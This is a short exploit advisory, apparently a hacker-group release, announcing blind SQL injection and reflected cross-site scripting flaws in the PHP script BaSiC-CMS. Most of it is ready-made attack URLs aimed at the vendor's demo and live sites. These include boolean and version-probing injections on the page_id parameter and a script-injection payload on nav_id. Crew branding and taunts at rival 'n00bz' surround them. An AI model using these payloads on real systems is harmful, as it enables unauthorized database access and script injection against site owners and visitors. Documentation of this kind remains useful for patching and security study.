BaSiC-CMS suffers from cross site scripting and blind remote SQL injection vulnerabilities.
481ed3e5b3f1326c468249cb7e23215102d8c728225ddd5704d0e3d0a7d61436
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_1_0 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] For Ask: [ r-d@passport.com]
[?] Script: [ BaSiC-CMS ]
[?] Home Scirpt [ http://www.basic-cms.de/ ]
[?] Language: [ PHP ]
[?] Founder: [ Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - My L0vE A ]
[?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..]
########################################################################
===[ Exploit SQL Blind ]===
[»] Exploit : index.php?r=&page_id=[Blind]
http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true
http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse
http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=4 << this true
http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=5 << this faulse
===[ Exploit XSS ]===
index.php?&nav_id=[XSS Code]
http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
./Greetz For All my Frindes
==============================================================================
#sEc-r1z.com Str1kEz y0u !